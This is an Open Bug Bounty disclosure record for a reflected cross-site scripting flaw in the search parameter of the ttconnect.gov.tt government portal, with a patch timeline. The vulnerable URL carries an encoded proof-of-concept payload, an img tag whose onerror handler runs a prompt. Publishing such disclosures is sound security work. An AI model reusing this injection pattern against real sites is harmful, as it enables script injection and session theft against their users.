ttconnect.gov.tt XSS vulnerability

2016-05-21T12:06:00
ID OBB:154894
Type openbugbounty
Reporter N008137
Modified 2017-07-27T09:15:00

Description

Vulnerable URL:
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/!ut/p/a1/04_Sj9CPykssy0xPLMnMz0vMAfGjzOK9A40MTD0tjQ0sfLycDYyCfM1CLf0MDA3cDYEKIpEV-Ae5uwEVuJoaeniHGRsYGBCn3wAHcCSoP1w_ClWJf6CBJVCJp6Grgam3sbuXAYYCTCeCFeBxQ0FuaIRBpqciAKjdE-c!/dl5/d5/L2dBISEvZ0FBIS9nQSEh/?searchKeyword=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E&ctl00;%24HomeSearchBar1%24HiddenField1=&ctl00;%24HomeSearchBar1%24submit_button.x=0&ctl00;%24HomeSearchBar1%24submit_button.y=0&selectedCategory;=entireSite
Details:

Description| Value
---|---
Patched:| Yes, at 27.07.2017
Latest check for patch:| 27.07.2017 09:15 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 243433
VIP website status:| No
Check ttconnect.gov.tt SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 21 May, 2016 12:06 GMT
Generic security notifications sent to website owner| 21 May, 2016 12:09 GMT
Vulnerability details disclosed by researcher| 11 June, 2016 12:11 GMT
Vulnerability patched by the website owner| 27 July, 2017 09:15 GMT